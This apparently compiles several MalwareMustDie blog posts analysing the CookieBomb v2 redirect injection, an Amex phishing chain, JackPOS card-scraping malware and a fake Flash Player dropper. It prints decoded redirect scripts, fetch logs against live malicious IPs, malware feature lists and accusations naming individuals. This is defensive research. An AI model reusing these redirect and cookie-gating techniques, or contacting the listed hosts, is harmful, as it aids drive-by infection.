The part that you should pay attention to is this part only: The red and orange marked parts are a condition that should be passed (read: bypassed) to detonate the decoding generator in line 174; to be specific, the red part is the obfuscation-related condition and the orange one is the condition IF you have the desired cookie in your browser. So, by understanding this, you can detonate this CookieBomb by eliminating those two silly functions and going straight to the value generated by the deobfuscation generator logic, as I coded below, just run it :-) The URL that is being used to redirect the victim that has a "ticket" (read: cookie) for infection is marked in red.
Let's see IF the deobfuscation is correct, by accessing the URL..
Yep, the PHP is there alright. And.. (why not?) let's try to trigger the "bomb" of this lame site w/ MMD's lame cookies ;-))
* About to connect() to 91.239.15.61 port 80 (#0)
*   Trying 91.239.15.61...
* Adding handle: conn: 0x28894100
* Adding handle: send: 0
* Adding handle: recv: 0
* Curl_addHandleToPipeline: length: 1
* - Conn 0 (0x28894100) send_pipe: 1, recv_pipe: 0
* Connected to 91.239.15.61 (91.239.15.61) port 80 (#0)
> GET /g.php HTTP/1.1
> User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
> Host: 91.239.15.61
> Accept: */*
> Referer: h00p://www.nose-highschool.ed.jp/
> Cookie: visited_uq=55;expires=Thu, 23 Jan 2014 14:40:07 GMT; path=/
>
< HTTP/1.1 302 Found
< Date: Thu, 23 Jan 2014 06:56:30 GMT
* Server Apache/2.2.22 (Ubuntu) is not blacklisted
< Server: Apache/2.2.22 (Ubuntu)
< X-Powered-By: PHP/5.4.9-4ubuntu2.4
< Location: http://goo.gl/Yun4bN
< Vary: Accept-Encoding
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
Yes, both efforts above were 302 redirected to some sites that have some possibilities of redirection (read: TDS), with the short URL used noted. Meaning the CookieBomb PHP script (the server side) is there and serving.
The story does not end here, friends; you must feed the cookie request to this PHP file with the right parameter. Use my previous writings here -->>[MMD Blog] and here -->>[MMD Blog] as a guide to figure out where this infection is heading :D - believe me, it is not that difficult! And that is for you to dig further, since I have to rest, so good luck! :-)
The injected code has a redirection to this IP (which is being utilized for CookieBomb PHP scripts):
91.239.15.61
And the URLs below are definitely bad:
91.239.15.61/g.php
91.239.15.61/google.js
And you can guess the location of this IP :-) The above information is the subject to clean up.
In the previous 1st part, I explained the first decoding of the new design in the CookieBomb (version 2) threat with easy decoding (read: "Detonating") for novices to get a quick URL redirection reference of the next infection. The analysis can be accessed here -->>[MMD-BLOG]
New Design of CookieBomb v2 in words..
The new design of CookieBomb implements a combination of two cookie cushions: the first cushion of cookie forwarding condition and checking is performed, and upon success the victim will be redirected to the NEXT cushion of the cookie checking scheme, which is the well-known URL of [URL]/google.js in our case. So in order to get the right path of infection on the malware, researchers will need to have (read: to fool and fake) two cookies. We are going to discuss this in detail in this post. The First Cushion of the cookie condition (in JavaScript obfuscation) redirects you to the remote Second Cushion of the cookie condition (in JavaScript obfuscation). Each cushion has a different condition check of the cookies used, and the Second Cushion (will be discussed below) is checking the REFERER against a search engine list BEFORE redirecting you into the main TDS forwarder script (in this case the file g.php).
CookieBomb v2: Decoding & Analysis of Second Cushion
In this part I will decode the second cushion used by the CookieBomb injected code in some compromised sites that call the URL below:
91.239.15.61/google.js
First is the PoC of fetching the file:
--2014-01-30 02:43:56--  91.239.15.61/google.js
Connecting to 91.239.15.61:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2266 (2.2K) [application/javascript]
Saving to: 'google.js'
100%[==========================>] 2,266 --.-K/s in 0s
2014-01-30 02:43:57 (36.3 MB/s) - 'google.js' saved [2266/2266]
And I am re-pasting the obfuscated code below, and the beautified code is here -->>[PASTEBIN]
After our internal discussion with the MMD Germany decoder members (thank you for pointing out some unseen points), from the pattern of obfuscation seen, we came to the conclusion that the obfuscator tool used to encode the original code is like this one here --->>[LINK/GOOD SITE]
Moving along, after taking a look into the first obfuscation to find the hexadecimal sets that lead to ASCII characters, stored in the array of var _0xe2b8: In the picture above I marked the first 13 strings only (sorry, there are just too many.. and I was too tired); if you replace them you'll get the arrays below:
var _0xe2b8 = ["referrer","google","yahoo","bing","yandex","baidu","gigablast","soso","blekko","exalead","sogou","duckduckgo","volunia","length","indexOf","location","h00p://91.239.15.61/g.php","cookie","","=",";","substring","getDate","setDate","","; expires=","toUTCstring","referrerRedirectCookie","do not redirect"];
Replacing these arrays into the obfuscated code below:
And you will get the result below:
Which makes some sense: the access to google.js in effect needs a REFERER (point 1; noted, yes I know it misses an R), the var se means Search Engines.. meaning the access coming from these will fit the next process (point 2), and also (see point 3) the redirection access uses JavaScript on the window object by changing window.location.
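The replacement step described above (decode the hex-escaped strings of var _0xe2b8, then substitute each _0xe2b8[0x..] reference in the code) is mechanical enough to script, which also spares the manual marking mentioned earlier and follows the Part 1 advice of ignoring the cookie helper functions and reading the generated values directly. Below is an added example of such a helper; it is not code from this post or from MalwareMustDie. The obfuscated input it parses is a short constructed sample in the same style: the array name _0xe2b8 is taken from the post, but the strings and the example.invalid URL are made up, so this is not the live google.js.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample in the style of the obfuscator described in the post
# (hex-escaped string array plus _0xe2b8[0x..] references). The array name
# _0xe2b8 is the one the post shows; the strings and the example.invalid URL
# are constructed here. This is NOT the live google.js.
SAMPLE_JS = (
    'var _0xe2b8=["\\x72\\x65\\x66\\x65\\x72\\x72\\x65\\x72",'   # "referrer"
    '"\\x67\\x6F\\x6F\\x67\\x6C\\x65",'                         # "google"
    '"\\x69\\x6E\\x64\\x65\\x78\\x4F\\x66",'                     # "indexOf"
    '"\\x6C\\x6F\\x63\\x61\\x74\\x69\\x6F\\x6E",'                # "location"
    '"\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x65\\x78\\x61\\x6D\\x70\\x6C\\x65'
    '\\x2E\\x69\\x6E\\x76\\x61\\x6C\\x69\\x64\\x2F\\x67\\x2E\\x70\\x68\\x70"];'
    'var se=[_0xe2b8[0x1]];'
    'if(document[_0xe2b8[0x0]][_0xe2b8[0x2]](se[0])>-1){'
    'window[_0xe2b8[0x3]]=_0xe2b8[0x4];}'
)

# The array declaration: var _0x<hex> = [ ... ];
ARRAY_RE = re.compile(r'var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[(.*?)\];', re.S)
# One double-quoted JS string literal; escapes are kept for decoding below
STRING_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
# \xNN, \uNNNN or a single escaped character, decoded in one pass
ESC_RE = re.compile(r'\\(x[0-9a-fA-F]{2}|u[0-9a-fA-F]{4}|.)')
URL_RE = re.compile(r'^https?://', re.I)


def unescape_js_string(s: str) -> str:
    """Turn the JS escapes used by the obfuscator back into plain text."""
    def one(m: "re.Match[str]") -> str:
        e = m.group(1)
        if e[0] in ('x', 'u'):
            return chr(int(e[1:], 16))
        return {'n': '\n', 'r': '\r', 't': '\t'}.get(e, e)
    return ESC_RE.sub(one, s)


def decode_string_array(js: str) -> Tuple[Optional[str], List[str]]:
    """Return (array name, decoded strings) for the first var _0x.. = [..]; found."""
    m = ARRAY_RE.search(js)
    if m is None:
        return None, []
    return m.group(1), [unescape_js_string(raw) for raw in STRING_RE.findall(m.group(2))]


def inline_array_refs(js: str) -> str:
    """Rewrite every NAME[index] after the declaration as its decoded literal."""
    m = ARRAY_RE.search(js)
    if m is None:
        return js
    name, strings = decode_string_array(js)
    ref_re = re.compile(re.escape(name) + r'\[(0x[0-9a-fA-F]+|\d+)\]')

    def repl(ref: "re.Match[str]") -> str:
        tok = ref.group(1)
        idx = int(tok, 16) if tok.lower().startswith('0x') else int(tok)
        if idx >= len(strings):
            return ref.group(0)  # out of range: leave the reference untouched
        literal = strings[idx].replace('\\', '\\\\').replace('"', '\\"')
        return '"' + literal + '"'

    # keep the declaration so the reader can compare, rewrite the code after it
    return js[:m.end()] + ref_re.sub(repl, js[m.end():])


def extract_urls(strings: List[str]) -> List[str]:
    """The decoded strings that are URLs: the redirect targets to block."""
    return [s for s in strings if URL_RE.match(s)]


if __name__ == '__main__':
    arr_name, decoded = decode_string_array(SAMPLE_JS)
    print(arr_name, decoded)
    print(inline_array_refs(SAMPLE_JS))
    print('redirect targets:', extract_urls(decoded))
```

Run it on a saved copy of the script (fetched with wget, not a browser) and the rewritten code reads as plain `document["referrer"]["indexOf"](...)` and `window["location"]=...`, so the search engine list and the redirect URL can be read off without touching the obfuscation chain or the cookie functions.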
"The Cookie scheme" of 2nd Cushion Parts
The set of cookie operation functions starts from the grabbing logic of the cookie as per the decoded code below (the variable name was adjusted): As you can see, the checks run through some possibilities of how the cookie data was stored by the browsers, and the grabbed data is stored in var c_value.
And it will be followed by calling the checking procedure of the cookies as per the code below: Note that the "Go" and "No go" flags are the "true" and "false" results of this function.. If the result is "false" then you can't go to the stated redirection, and the cookie for you to be redirected on your next visit will be made for you via the code below:
Debug the CookieBomb v2
Our team tested the flow with the debugger to simulate some possibilities covered by this 2nd part of the cookie logic:
And it runs as described in the log above if you don't have the ticket for infection (read: the necessary cookies).
CookieBomb v2: Google.JS (2nd Cushion) in Graph
To make the second cushion cookie check scheme in CookieBomb v2 easier to understand, I made the simple graph below; sorry for some notes in JP that I made:
Regarding the 91.239.15.61/g.php TDS redirector, it has the redirection function, and so far, as posted in Part 1, it still goes to a parking domain site. We are searching for the server-side code of this threat now; if you happen to see and can access infected sites containing the file g.php (or similar) mentioned in this post, please ping me in the comments.
How bad the infection so far?
It is very, very BAD!!!, attacking all over the web..
Epilogue
Hope this writing helps in understanding the evolution of the CookieBomb threat; blocking the next URL/IP AFTER being redirected from the CookieBomb first cushion will be a very good idea.
As you may know, the MMD blog focuses on malware/botnet related threats. But today I want to make an exception: my SMTP honeypot is full of American Express phishing scam emails, so I dared myself to write about my "experience" with this phishing matter. It is not a thorough analysis, so please bear with some lack of information in the post.
On the other hand, I captured everything. For the convenience of law enforcement and threat researchers' investigation I attached the PCAP & all captured data grabbed from the session; please feel free to use it and analyze it deeper. The point of this public post is to raise awareness of this phishing attempt since some people I know got hit by this scam. Here we go:
It all started from a phishing email: In phishing, the URL is important; see the above trick of the redirector URL in the email. And URLquery has records on OTHER URLs too, see the check requests below: ↑We can say that kaindustries.comcastbiz.net (216.87.186.70) is utilized by a phishing effort.
If you click any link in the email, you will get forwarded:
And end up at the fake American Express site below: So this perfectbackstretch. com/americanexpress/ on 23.239.10.217 is the landing URL.
The route of the above redirections was generated as per below:
PoC of the forwarding routes in my Wireshark capture in a Fiddler-like setting :-)
For old-schoolers like me, just fire the marked conditions :-)
The scripts that trigger the redirection to the destination are in the URL written in the spam:
Which will call the destination coded in each JavaScript code in each JS file, as per one sample below:
Additionally, I downloaded all the HTML code and ran it locally to find a perfect match.. the whole code is meant to run on any remote side without much dependency on its host/server..
Some suspicious points..
There are plenty of suspicious points, some JavaScripts to check, and those are well made to conduct this phishing; again, please see the PCAP for more details on those. This phishing scheme is also using GoDaddy's SSL service for the encryption; I am not so sure whether the real American Express site is using it too. BUT I want to point you to the correlation of remote site accesses that have been spotted and recorded while following the phishing link, and I found it has two suspicious connections and each of those is really "interesting".
To be noted: I am not pointing a finger at anyone; there might also be traps implemented by the phisher to disrupt the investigation, or maybe AMEX itself has these links/codes by default, I don't know 100% about that. So I will let the AmEx phishing experts judge further; just read the explanation of the two points below and judge it by yourself. Any opinions are welcome in the comments.
1. Cookie link (or callback?) referring to the redirector kaindustries.comcastbiz.net on the landing page..
Well, we saw the page I snipped above, but behind the process there was an interesting call below: Yes, ok, it looks like it is checking a favicon and received 404, well nothing special.. but after some session on the phishing site executed further, the recorded PCAP below was requesting a similar but quite interesting packet: It has the cookie request, doesn't it?.. and it is coded with URL encoding, so..
I am fond of cookie codes like this (recently, thx to the CookieBomb crooks), and made it "beautiful" and.. There!.. A cookie to keep the connection after login.. It explains the redirector sites and the access "ticket" to the phishing landing page.. hmm.. interesting.
So what's kaindustries.comcastbiz.net?
;; ANSWER SECTION:
kaindustries.comcastbiz.net. 13597 IN A 216.87.186.70
The web site: Doesn't look strange so far.. but why is the phishing page URL linked to this site? Answer: A compromised site. So what's with the "cookie" request noting the source of infection? Well, this might be the phishing crook's way to know which malvertisement site/spam ticket hits this site, isn't it? The bad guys are quite persistent in tracking which spam/redirector URL the request is coming from.
Ah, yes. We reported this incident to the site's contact:
2. An "abuse" request (to fake an AmEx ticket?) to nexus.ensighten.com
There is also an interesting GET command to nexus.ensighten.com:
If we beautify the GET URL format it will look as per below:
What was causing that GET request is the Bootstrap script below:
A better view of the weird part is:
So let's see if there is any response from nexus.ensighten.com to this request:
Is it a coincidence to link to nexus.ensighten.com, grab the phishing site's URL and send it? Does the real American Express site also link to it? I leave the answer to the American Express Online folks.. If YES, then this is merely an abuse of the AmEx-used API (assuming that nexus.ensighten.com is a legit API of AMEX) to fake the appearance of the phishing page to look "more legit" to fool the victims.
But if the answer is NO.. this could be a potential phishing tracking scheme to know the traffic of the hits; we can imagine a money-sharing scheme starting at this point between the criminals involved, or maybe a panel on that site too?
For some checks, I requested the above JS GET URL with RuleID = 124663 and received the code below: And the second request with RuleID = 302786 received the response below: Either these responses are coming from a legit AmEx Online API that the phishing crooks abused or.. they are good fakes..
Anyway, nexus.ensighten.com is in AWS: Is it normal?
And this is the page of nexus.ensighten.com: Is it normal?
It is out of my expertise. I will pass & leave it to the American Express security team, phishing researcher folks and law enforcement agencies in the United States to dig further..
Prologue
Up to this point I think I will leave the further investigation to the AMEX phishing experts. I share my recorded data to be used for further investigation as per the snipped picture below (click the picture to download). Please leave a comment with your contact information (email) for the password; I will not publish comments asking for the password.
The URLquery for this phishing is --->>[HERE] It was taken at the same time as I checked, but URLQuery looks like it cannot access the same result as mine; on my PC with a JP IP I can access it.
Kudos to our friend who noticed the same threat too :-)
@MalwareMustDie FYI this amex phish campaign is back today. E.g., hxxp://www[.]mossandlam[.]com/malfunctioning/index[.]html
As credit for the current threat's awareness, a lot of you probably noticed the JackPOS malware posts at: Xylit0l's post in Kernel Mode here -->>[kernelmode], the IntelCrawler press release here -->>[IntelCrawler], and Josh Grunzweig's analysis on Trustwave SpiderLabs here -->>[LINK]
This post is additional intelligence data supporting the threat's technicalities written in the main investigations of the threat by the above mentioned gentlemen; it is our share which may help law enforcement aim a better cannon directly at the bad actors (read: Moronz) who are actively in the effort of selling and promoting the threat, the ones behind the distribution of the JackPOS malware scene.
As always mentioned in previous posts, we (read: MMD / MalwareMustDie, NPO - Anti CyberCrime & Malware Research Group) work not only in a defensive / mitigating way against the threat, but are proactive in spotting the root of the threat at as early a stage as possible, and inviting and thus supporting law enforcement & CERT folks to initiate the crime case upon it.
DarkK0de (DK) Crook's Forum
This information was all compiled from our eyes in the DK forum. It stated the promotion, the testing information, screenshots, the latest specification of JackPOS (furthermore I will refer to it as "the product"), the screenshots and the contact information of the bad actor (read: moronz) behind it. I am sorry, after "internal discussion" it was decided not to paste the DK forum screenshots themselves, since that would raise the risk of blowing away our intelligence channel.
What we post here may help to add more images & information of the "product" design of JackPOS, to the ones that IntelCrawler, Xylit0l & Josh were working hard on analyzing, in the following sections. To be noted, please understand, we are not adding more technical details.. but adding the campaign product design data, and also we are not aiming for fame or riding on the flux of news for this threat. It's just that we did not see the right aim on clues of the on-going investigation of the threat's source so far, so this is the share to lead law enforcement friends to aim closer to the target, the right "crook's forum" as the source of this malware campaign: "The DarkK0de".
And for you, all the malware crooks that I know are reading this post too, we want to let you know, MMD is different, WE BREATHE BEHIND YOUR NECK! and we mean it, no matter how tight your "poor security" environment for a so-called gathering buff (a.k.a. "forums"? ..whatever..) is. Just STOP your malicious activity NOW before it is getting too late! Go and get a decent day job like all of us and live a decent life without fear. Consider this as a warning.
OK, the main course:
Screenshots
The screenshots DK was posting, as they are:
Admin panel:
Dumps of CreditCard panel
The Bots Control Panel
Promotion Thread
Malware: (functions & specs)
- Coded in modern c++
- Size 145 kbytes (upx packed)
- Small resource usage, ~90% of time 4 mbytes RAM and 0-2% cpu usage
- Doesn't use regular expressions
- Grabs track1/track2
- Update / Execute virus
- Process persistence, if process closed, automatically will start again
- Registry persistence, if registry key deleted or changed, it's restored
- Very stable and well tested
- Same track1/track2 won't be sent second time to panel (saved hashes of dumps in a file)
- Once it finds processes with valid data, the virus scrapes just them in a loop of 100 times, then rescans all the processes till it finds productive ones. (Done in one thread for stability)
Product Updates:
The new version of the virus has some new features that the old one doesn't:
- Support of Unicode dumps in processes
- Much more stable
- Improved panel (issues with archiving of dumps and bots), also changed exporting
- Once it finds processes with valid data, the virus scrapes just them in a loop of 100 times, then rescans all the processes till it finds productive ones. (Done in one thread for stability)
This Rome0 guy is a well-known carder and scammer, with the contacts below (Kudos MMD DE team!)
ICQ 22222193
Jabber 22222193(at)jabber.cz
Prologue
The above information is enough to lead law enforcement to take action to get the real actors' ID behind the screen. It is reachable, and we pass it all to justice. Herewith we are backing off on the investigation and intelligence of this case for the law to follow properly.
MalwareMustDie, NPO., does not own any source code / samples / reversing data for this threat; we are posting this exclusively to support the other entities mentioned above in this investigation, so please ask the mentioned front-liner posters for further details.
To "some" fellow researchers: Don't mock us for taking down these bad domains. Think of the victims who get infected on an hourly basis! Sorry if we blew your "tracking" objects away. Because of this takedown the data behind these is now ready for law enforcement to collect.
The background
Following the case of the Nuclear Exploit Kit malware infection via abuse of .PW 2LD domains (initially spotted: 31.41.221.131 to 31.41.221.139) - as the follow-up due to the below malicious verdict of the researcher team & friends:
To be noted: We are not going to expose any technical evidence for this case in this post, and this post is focusing on the Tango Down effort initiated by MalwareMustDie, NPO. The details of the Nuclear Pack itself are well documented for MMD friends in our public forum as an information database of exploitation. (You have to be invited to be a member.)
Spotting and following the movement of this threat from 31 December 2013 until 13 February 2014, and witnessing the movement of the threat of the same group/actors:
From OVH.COM (France) to: BESTHOSTING.UA (Kiev, Ukraine) at: AS 2655 ref-->>http://bgp.he.net/AS42655
Additional: BESTHOSTING.UA ref-->>https://www.besthosting.ua/en/
Additional information on the threat (to be added) - Thank you URLQuery!
We requested the suspension of a total of 174 domains with the breakdown stated below, and the suspension was done successfully.
These bad domains share the same bad actor's route. The registration information of the domain list stated below is traceable to potential positive evidence of the ID of the actors that can be used in the law enforcement investigation following this cyber crime case; LE will need to directly request it via ICANN from the registration entity accordingly.
Any malicious system exploitation and malware infection traffic recorded, and logs related to the verdicted domains and their IP addresses, can be used as evidence of the cyber crime activities; please pass it to your nearest CERT for further processing. The IPs recorded in each log could still be in operation, which is good material for further monitoring and mitigation of the threat, and this post can be used officially as a reference. Please be noted of this advisory.
Tango Down
1. Under NAMECHEAP.COM (LA, USA) Registrar (Count: 13) - Status: serverHold
$ date && bash check_nonru.sh
Thu Feb 13 20:57:51 JST 2014
On Sunday, February 16th 2014, in the presentation at AV Tokyo 2013.5, a prestigious security event in Japan (link), we (read: MalwareMustDie, an NPO of the Anti Cyber Crime International Research Group) announced the connection between several cyber crime actions (malicious abuse of computer exploitation and credentials with the usage of malware) of: CookieBomb (IFRAME from the "North") infection (link), Kelihos Botnet infection (link), spam that leads to malware infection / malvertisement (link), and the usage of malicious exploitation tools such as RedKit/Goon/Infinity for malware infection (link), which are causing a series of abuses against the Japan National Cyber Space & Networking Jurisdiction under the following security violation verdicts:
(1) Remote hack on personal computers of national individuals/entities
(2) Stealing of credentials and privacy property of national individuals/entities
(3) 30,000+ malicious code injections by web hacking into national service infrastructure
(4) Abusive utilization of national computers to distribute malware worldwide.
The presentation video (censored):
The crime, which is currently still in progress for a significantly long time with an incremental trend in damage quantity upon the verdicts stated above, was proven by submitting all investigation facts and evidence that lead to one Russian Federation citizen as the individual crime suspect (link), where the details of the actor's identification were announced "beyond any doubt" in the event to the Japan national security community, and was followed by officially filing all investigation material under the category of National Cyber Crime Abuse and Act of Terrorism against the National Network, reported to the National Police Agency, Japan - Cyber Force Center, High-Tech Crime Technology Division - Cyber Terror Incident Handling Unit (link), with notification to the Information-technology Promotion Agency - Japan (link), JP-CERT/CC (link), Interpol Digital Crime Investigation Support, Europol EC3 (link), and the Anti-Phishing Working Group (link), and several related European law enforcement agencies, witnessed by important national security top-notch researchers.
The facts collected over the investigation time frame, and the unbearable rise of casualties and damage of the crime in progress on the Japan national computer infrastructure, were clearly presented to the national security community attendees at the event, and it was urged to raise the serious national security issue against the malicious acts of a Russian Federation individual citizen (link) who is still performing his daily crime activity in abusing the Japan national network.
We hope to raise an official request for cooperation from Japan law enforcement to Russian Federation law enforcement to conduct a firm act to stop this crime and terror effort for good. Further delay in action from the law in the Russian Federation against the positively confirmed individual suspect will only prolong the unnecessary damage on victims on Japan soil, not to mention other countries that have been victimized like Taiwan, India, Ukraine, Georgia, Poland and the Russian Federation's own victims as the top hit of the threat, or other countries in Europe that have been abused and used as control center servers of this malware activity.
To be noted, the Kelihos Botnet infection itself is also spotted infiltrating United States personal computer dial-up infrastructure, and the investigation information of the threat with its relation to a notorious spammer (link) and its identification was also reported accordingly to the Federal Bureau of Investigation in the United States. To all victimized countries of the same threat, we urge you to do the same procedure as we are conducting here in Japan, by filing an official crime report to be followed and escalated properly by your law enforcement to the Russian Federation law enforcement.
MalwareMustDie, NPO and partners in the investigation have been in this operation since August 2013; the real identification of the bad actor was revealed in September 2013 with the collaboration of our crime investigation partner in the Russian Federation, GroupIB (link), who filed the case with the Russian Federation law enforcement in October 2013. We revealed the weakness of the botnet at BotConf 2013, December 5th, 2013 in Nantes, France. As a proof of concept in stopping the malware payload and positively IDing the CNC owner we did the "takedown" of most of the Kelihos botnet CNCs between December 1-3, 2013.
Today, I was almost going to bed when I bumped into this threat. Please kindly bear with the sleepy eyes writing this. I am combining the screenshots and log/details in text; hopefully no filtering product will block this post for a bit of URL pasting.
This writing contains many points that are important information for fellow friends and the mentioned public services to be aware of being abused by this malware infection session. So I wrote this as fast as possible, leaving the payload binary analysis and exploit analysis for a rain check. Anyone who can help to contact the related abuse desks is very highly appreciated.
Infection Source:
First of all: the source of infection is the malware infection code/scripts that were implemented on the IP and domain below, located in the OVH network in France; I really hope to have help from France friends to clean this IP of any malware infector toolkits installed:
Secondly, the infector starts from a Japanese IP under the domain shortening .biz. This needs to be cleaned up too, yet I think more infectors exist..
The background
It started when checking a suspicious URL, accessed it in the browser as per below:
I regenerated with the separate scheme to record the below log (for the source of infection details purpose), just to make sure that we had everything in our hands:
--2014-02-24 02:40:02-- h00p://shortening .biz/qnwr Resolving shortening.biz... 59.106.171.55 Caching shortening.biz => 59.106.171.55 Connecting to shortening.biz|59.106.171.55|:80... connected. : GET /qnwr HTTP/1.1 Host: shortening.biz HTTP request sent, awaiting response... : HTTP/1.1 301 Moved Permanently Date: Sun, 23 Feb 2014 17:40:03 GMT Server: Apache/1.3.42 (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8e Location: http://shortening.biz/qnwr/ Keep-Alive: timeout=5, max=19 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 : 301 Moved Permanently Registered socket 4 for persistent reuse. Location: http://shortening.biz/qnwr/ [following] Skipping 302 bytes of body: [ 301 Moved Permanently Moved Permanently The document has moved (A HREF="h00p://shortening .biz/qnwr/")here(/A) Apache/1.3.42 Server at shortening.biz Port 80 ] done. : --2014-02-24 02:40:03-- h00p://shortening .biz/qnwr/ GET /qnwr/ HTTP/1.1 Host: shortening.biz : HTTP/1.1 200 OK Date: Sun, 23 Feb 2014 17:40:03 GMT Server: Apache/1.3.42 (Unix) mod_ssl/2.8.31 OpenSSL/0.9.8e Last-Modified: Thu, 23 Jan 2014 14:54:18 GMT ETag: "1135-52e12d1a" Accept-Ranges: bytes Content-Length: 4405 Keep-Alive: timeout=5, max=19 Connection: Keep-Alive Content-Type: text/html : 200 OK Length: 4405 (4.3K) [text/html] Saving to: ‘sample.mmd’ 100%[=======================================================>] 4,405 --.-K/s in 0.009s 2014-02-24 02:40:03 (459 KB/s) - ‘sample.mmd’ saved [4405/4405]
Back to the browser, in the short while the browser's address bar flickering to the redirection URL as per below: And this act is confirmed by the series of the html tag meta refresh code grepped below:
What happened next? I was forwarded to a page with a video of "a lady in the bed", as captured below. I was just about to praise how fortunate I was.. but the video soon stopped and a warning message came up, popping a download of a "Flash Player Setup", as shown below:
The Path to Payload
Back in the shell, I simulated the download page for evidence, which actually gave me the script below. Now we know why I got that redirection: the dropboxusercontent.com link (the very bottom one) is serving the infection landing page, and I was redirected into it. I will explain this later on. There are also other conditions for further redirection, for mobile access and for the Opera browser, via GOO.GL short URLs. If we expand those short URLs for mobile and Opera we get a better picture (I will have to leave it to other friends to check those two links deeper..)
And this is the malware file downloaded if you match the desired condition. This payload is well detected by the AV industry, as shown in the VirusTotal result here-->>[link]. If you run the payload you get the HTTP query and response as follows. The payload downloads a "config" with the hash and URL of another malware, as shown here. Here is the "guncel.exe" download session in my shell; a simple wget will do. This could be an update of some sort. This is the VirusTotal report of "guncel.exe"; it is the same file as the original payload, and it is also evidence that the origin of the payload is wjetphp.com (46.105.55.251)-->>[link]. The detection rate as a VBA-based Trojan Downloader is not so bad after all, good work.
Below is an interesting trace of what this malware did in memory:
These are just some traces of the VBA calls used (during the creation of a registry key):
Quick analysis that might help fellow researchers and infected victims:
The payload downloads the background.js JavaScript from a URL planted in the binary, as per the traffic below. The script is pasted here-->>[link]. You can see clearly the malicious traffic redirection scheme and the access URL to the landing page (origin of the infection) in that script..
The next traffic explains how background.js is called: the file manifest.json (a browser extension manifest) was downloaded, and it declares how background.js is executed, setting several security privileges for the execution of the script itself.. You can see the effort to fake a "Google Shockwave Player" (is there any such product??) in the execution of background.js above? Things are starting to make much more sense on why so many Google-related "images" are used here.
PS: I will add some more reversing notes later on, but let us move on a bit.. too little time.. there are more important parts to cover..
Simulating the landing page access in the shell gives something like this:
GET /s/pwuh8wdutwot4dg/rezillik.html HTTP/1.1
Host: dl.dropboxusercontent.com
:
HTTP/1.1 200 OK
accept-ranges: bytes
cache-control: max-age=0
Content-Type: text/html; charset=utf-8
Date: Sun, 23 Feb 2014 21:01:55 GMT
etag: 2n
pragma: public
Server: nginx
x-dropbox-request-id: ecd60af812734360278c876a87176a00
X-RequestId: 6f612d52e7e3c0e526aa4b355328e047
x-server-response-time: 202
Content-Length: 6841
Connection: keep-alive
:
---response end---
200 OK
Registered socket 4 for persistent reuse.
Length: 6841 (6.7K) [text/html]
Saving to: ‘sample4.mmd’
How did I get the payload downloaded then?? Let's look at the code inside the page. Well.. it seems I was hit by the timer function in this code: the Google short URL is again used to hide the real malware payload URL, which is served from the Google Code SVN download!! The download log can be seen in the follow-up section..
Well.. the bad guy behind this is really trying hard to convince the victim that some kind of Google application is being installed :-)
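The two client-side redirection styles met above (the meta refresh tags grepped from the shortener's pages, and the timer-driven redirect in the Dropbox-hosted landing page) can be reconstructed offline without ever touching the live hosts. The Python below is an added example written for this edit, not code from the original post; the page contents and every URL in it are constructed for the example (none of the real domains are reused), and the JavaScript handling is a regex approximation, not a JS interpreter.

```python
"""Added example (not from the original post): walk a chain of client-side
redirections offline over an {url: html} map, the way the shortener ->
video page -> landing page chain above was reconstructed by hand."""
import re
from urllib.parse import urljoin

# <meta http-equiv="refresh" content="N;url=...">  (attribute order as commonly seen)
META_REFRESH = re.compile(
    r'<meta[^>]+http-equiv\s*=\s*["\']?refresh["\']?[^>]*'
    r'content\s*=\s*["\']\s*(\d+)\s*;\s*url\s*=\s*([^"\']+)["\']',
    re.IGNORECASE)
# window.location = "..."  /  location.href = "..."
JS_LOCATION = re.compile(
    r'(?:window\.|document\.)?location(?:\.href)?\s*=\s*["\']([^"\']+)["\']',
    re.IGNORECASE)
# setTimeout(<anything>, <milliseconds>)
JS_TIMER = re.compile(r'setTimeout\s*\(.*?,\s*(\d+)\s*\)', re.IGNORECASE | re.DOTALL)


def extract_redirect(base_url, html):
    """Return (target_url, delay_seconds, method) or None when the page does
    not redirect. Relative targets are resolved against base_url; a meta
    refresh wins when both styles are present."""
    m = META_REFRESH.search(html)
    if m:
        return urljoin(base_url, m.group(2).strip()), float(m.group(1)), "meta-refresh"
    m = JS_LOCATION.search(html)
    if m:
        t = JS_TIMER.search(html)   # approximation: any timer on the page
        delay = int(t.group(1)) / 1000.0 if t else 0.0
        return urljoin(base_url, m.group(1).strip()), delay, ("js-timer" if t else "js")
    return None


def follow_chain(start_url, pages, max_hops=10):
    """Walk the redirection chain through the offline page map.
    Returns (hops, status): hops is a list of (url, delay, method) beginning
    with start_url; status is landed / not-fetched / loop / too-many-hops."""
    hops = [(start_url, 0.0, "start")]
    seen = {start_url}
    url, status = start_url, "too-many-hops"
    for _ in range(max_hops):
        html = pages.get(url)
        if html is None:
            status = "not-fetched"
            break
        hop = extract_redirect(url, html)
        if hop is None:
            status = "landed"
            break
        hops.append(hop)
        url = hop[0]
        if url in seen:          # redirect loop: stop instead of spinning
            status = "loop"
            break
        seen.add(url)
    return hops, status


# Constructed sample pages (example data only; no real domains reused).
SAMPLE_PAGES = {
    "http://short.example/abc":
        '<html><head><meta http-equiv="refresh" content="0;url=/abc/"></head></html>',
    "http://short.example/abc/":
        '<html><head><META HTTP-EQUIV="Refresh" CONTENT="2; URL=http://video.example/watch.html"></head></html>',
    "http://video.example/watch.html":
        '<html><body><video src="clip.mp4"></video>'
        '<script>setTimeout(function(){ window.location = "http://files.example/s/landing.html"; }, 3000);</script>'
        '</body></html>',
    "http://files.example/s/landing.html":
        '<html><body>Flash Player Setup <a href="setup.exe">download</a></body></html>',
}

if __name__ == "__main__":
    hops, status = follow_chain("http://short.example/abc", SAMPLE_PAGES)
    for url, delay, method in hops:
        print(f"{method:13s} +{delay:4.1f}s  {url}")
    print("status:", status)
```

The loop guard matters in practice: redirector kits often bounce between two hosts when a visitor does not match the targeting conditions, and a naive follower would hang there.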
Conclusion
How to conclude this matter generally? Obviously, well-known public internet services were targeted to spread this infection. Let me list how many abused services were spotted in this single case:
